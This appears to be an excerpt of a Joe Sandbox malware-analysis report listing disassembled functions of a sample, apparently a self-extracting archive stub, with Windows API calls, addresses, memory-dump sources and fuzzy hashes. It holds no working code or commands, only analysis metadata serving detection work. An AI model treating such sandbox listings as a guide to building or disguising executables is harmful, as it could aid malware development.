                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 530a5838246b0557050972c301e2bc85cb4586bdcfe2c4e7e7400153f7a96f11
                                                                                      • Instruction ID: a6b06c6505790d937d0571dd5694f397833c4e0bd40b6fab0ed09ae5ff525c18
                                                                                      • Opcode Fuzzy Hash: 530a5838246b0557050972c301e2bc85cb4586bdcfe2c4e7e7400153f7a96f11
                                                                                      • Instruction Fuzzy Hash: 85B012B12DC2027D314491412CC6F77410DC4C5B24730D01FF840C0081EACC1CD9443F
                                                                                      Function 0041C7B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: d5d0a5d68466c49d864b903f64e485f010a391570fea85aaaedfa1878a5d2e82
                                                                                      • Instruction ID: 35c4f66703c71098ebc62499767e97e63e325b3a18744d2d0118298ea7a1c2d3
                                                                                      • Opcode Fuzzy Hash: d5d0a5d68466c49d864b903f64e485f010a391570fea85aaaedfa1878a5d2e82
                                                                                      • Instruction Fuzzy Hash: 69B012B12DC2066D3144D1462C82F77410CC4C8B24730D01FF440C0191EACC1CD1413F
                                                                                      Function 0041C75A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 7c583c8fba02a9de65161721f84e46991b5192ef5397e37dc08c547e08e325bc
                                                                                      • Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
                                                                                      • Opcode Fuzzy Hash: 7c583c8fba02a9de65161721f84e46991b5192ef5397e37dc08c547e08e325bc
                                                                                      • Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
                                                                                      Function 0041C76E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: bed06b7e7dd5afd85056a88ce4e245572150161fdc79ad6a64be2159b6202107
                                                                                      • Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
                                                                                      • Opcode Fuzzy Hash: bed06b7e7dd5afd85056a88ce4e245572150161fdc79ad6a64be2159b6202107
                                                                                      • Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
                                                                                      Function 0041C778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: ed1ebf805150ceacb15d4e9cbcd338ed56157cca722b44776424257aef23b39d
                                                                                      • Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
                                                                                      • Opcode Fuzzy Hash: ed1ebf805150ceacb15d4e9cbcd338ed56157cca722b44776424257aef23b39d
                                                                                      • Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
                                                                                      Function 0041C782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 9ac74f6a6f73242f465cb1076f5c1369f6dda51d3b55601fbdeff8dc01d2e3e4
                                                                                      • Instruction ID: 75302f0dc510b124247ea63c9ad6388c717140e6934fb17529540b8347b8a091
                                                                                      • Opcode Fuzzy Hash: 9ac74f6a6f73242f465cb1076f5c1369f6dda51d3b55601fbdeff8dc01d2e3e4
                                                                                      • Instruction Fuzzy Hash: 4FA012B11E81037C300591011D42E77410CC4C4B54330541FF411800C0A8880885003D
                                                                                      Function 0041C7A7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 2cc8592bccbd31ca00c2baf4c773ab292c7381f1461a8de681e32c4fe32790f4
                                                                                      • Instruction ID: 5d34c4ef73159b48ef98f756ed2452bcc606b79b358a88c4f8171acb0e1c4188
                                                                                      • Opcode Fuzzy Hash: 2cc8592bccbd31ca00c2baf4c773ab292c7381f1461a8de681e32c4fe32790f4
                                                                                      • Instruction Fuzzy Hash: 57A012B11DC1037C300491412C42F77010CC4C4B64330440FF4018008168C808C1403D
                                                                                      Function 0041C7B1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 72ba3987d0c8a08886187db4b8e1a16d52aae4f82fc9d6be2ad8ef8a5d1211ea
                                                                                      • Instruction ID: 5d34c4ef73159b48ef98f756ed2452bcc606b79b358a88c4f8171acb0e1c4188
                                                                                      • Opcode Fuzzy Hash: 72ba3987d0c8a08886187db4b8e1a16d52aae4f82fc9d6be2ad8ef8a5d1211ea
                                                                                      • Instruction Fuzzy Hash: 57A012B11DC1037C300491412C42F77010CC4C4B64330440FF4018008168C808C1403D
                                                                                      Function 00409B6A Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNELBASE(?,00408EDB,?,?,-00001954), ref: 00409B6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File
                                                                                      • String ID:
                                                                                      • API String ID: 749574446-0
                                                                                      • Opcode ID: 9864bcb57162c85110c8faf64388ce5de8609e1676df7f9d29deef0ffaf89557
                                                                                      • Instruction ID: 6a0992ea27ef0c87fb6a312554a6ad9490973bdd4a744099f39c10c8d9797478
                                                                                      • Opcode Fuzzy Hash: 9864bcb57162c85110c8faf64388ce5de8609e1676df7f9d29deef0ffaf89557
                                                                                      • Instruction Fuzzy Hash: F1B011300E000A8A8F002B30EC088203A20EA2230A320A2B0A00AC80A2CB22C002AA08
                                                                                      Function 00419023 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,0041927A,00442120,00000000,00443122,00000006), ref: 00419027
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 1611563598-0
                                                                                      • Opcode ID: 4c3e9bb71c09b3981f1d50df5ccd69e8e2446fcc624f80265e99df0bb3e8ed9e
                                                                                      • Instruction ID: 0f491f621cda5b4557bb03b4954193c739ec83fd21feae94fc1f50dd17cedc17
                                                                                      • Opcode Fuzzy Hash: 4c3e9bb71c09b3981f1d50df5ccd69e8e2446fcc624f80265e99df0bb3e8ed9e
                                                                                      • Instruction Fuzzy Hash: 9CA0123019410647CE000B30CC09C1976505760702F0097307042C00A0CB318810E504
                                                                                      Function 004094A3 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(000000FF,?,?,00409473), ref: 004094BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 1197ff7dda9cbae130511b5618cf034556a88c9dc972b412d9298cd87bdfe929
                                                                                      • Instruction ID: 856e66f56f0b28dfa5396a68c02fa705947e0e3e0a6fb33033b04355c19c5cbb
                                                                                      • Opcode Fuzzy Hash: 1197ff7dda9cbae130511b5618cf034556a88c9dc972b412d9298cd87bdfe929
                                                                                      • Instruction Fuzzy Hash: 0BF0B47055AB044EDB308A24A548792B3E85B11725F04873FD0E6539D1D379684A8B14

                                                                                      Non-executed Functions

                                                                                      Function 0041A537 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
                                                                                        • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0041A5C8
                                                                                      • EndDialog.USER32(?,00000006), ref: 0041A5DB
                                                                                      • GetDlgItem.USER32(?,0000006C), ref: 0041A5F7
                                                                                      • SetFocus.USER32(00000000), ref: 0041A5FE
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 0041A63E
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0041A671
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0041A687
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0041A6A5
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041A6B5
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0041A6D2
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0041A6F0
                                                                                        • Part of subcall function 0040D142: LoadStringW.USER32(?,?,00000200,?), ref: 0040D187
                                                                                        • Part of subcall function 0040D142: LoadStringW.USER32(?,?,00000200,?), ref: 0040D19D
                                                                                      • _swprintf.LIBCMT ref: 0041A720
                                                                                        • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
                                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0041A733
                                                                                      • FindClose.KERNEL32(00000000), ref: 0041A736
                                                                                      • _swprintf.LIBCMT ref: 0041A791
                                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 0041A7A4
                                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0041A7BA
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0041A7DA
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041A7EA
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0041A804
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0041A81C
                                                                                      • _swprintf.LIBCMT ref: 0041A84D
                                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0041A860
                                                                                      • _swprintf.LIBCMT ref: 0041A8B0
                                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 0041A8C3
                                                                                        • Part of subcall function 0041932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00419355
                                                                                        • Part of subcall function 0041932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0043A154,?,?), ref: 004193A4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                      • API String ID: 3227067027-1840816070
                                                                                      • Opcode ID: 0efcb88c166d1052a20f1420ccdecff87bb937dc9efe3444558e107c45fb997f
                                                                                      • Instruction ID: d4bb10729dede2a45d4cd598446a7db89e0d72efb69f85dfdb0c70292ec08b94
                                                                                      • Opcode Fuzzy Hash: 0efcb88c166d1052a20f1420ccdecff87bb937dc9efe3444558e107c45fb997f
                                                                                      • Instruction Fuzzy Hash: 6591B672548308BBE231EBA0CC49FFB77ADEB49704F04482AF645D6180D775AA49876B
                                                                                      Function 00407070 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00407075
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 004071D5
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004071E5
                                                                                        • Part of subcall function 00407A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00407AAC
                                                                                        • Part of subcall function 00407A9D: GetLastError.KERNEL32 ref: 00407AF2
                                                                                        • Part of subcall function 00407A9D: CloseHandle.KERNEL32(?), ref: 00407B01
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 004071F0
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004072FE
                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0040732A
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040733C
                                                                                      • GetLastError.KERNEL32(00000015,00000000,?), ref: 0040734C
                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00407398
                                                                                      • DeleteFileW.KERNEL32(?), ref: 004073C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                      • API String ID: 3935142422-3508440684
                                                                                      • Opcode ID: a651dce6c16ec147ca00bb0e9ff455fb4e49c78d447f009a24f5e2618a7e0e46
                                                                                      • Instruction ID: 93471cfaedec1773bf66c9a54fbdc0c9308a64d9f63adc279eff9196ac87510e
                                                                                      • Opcode Fuzzy Hash: a651dce6c16ec147ca00bb0e9ff455fb4e49c78d447f009a24f5e2618a7e0e46
                                                                                      • Instruction Fuzzy Hash: AFB1C171D04218ABEB24DF64DC45BEE77B8AF08304F10457EF919E7282D738AA45CB69
                                                                                      Function 00403203 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 604COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memcmp
                                                                                      • String ID: CMT$h%u$hc%u
                                                                                      • API String ID: 3004599000-3282847064
                                                                                      • Opcode ID: ddf166f6b4bf2136a764b7f765d8ae9cf4a9bab3a460d7555e27824cf04812cd
                                                                                      • Instruction ID: c82075d55fccedc8009f26eee82ea6cb4e387a31c93fd15d465978f9233536a4
                                                                                      • Opcode Fuzzy Hash: ddf166f6b4bf2136a764b7f765d8ae9cf4a9bab3a460d7555e27824cf04812cd
                                                                                      • Instruction Fuzzy Hash: EC32C2715102849FDF14DF75C886AEA3BA9AF14304F04457FFD4AAB2C2DB789A48CB64
                                                                                      Function 0042A35E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
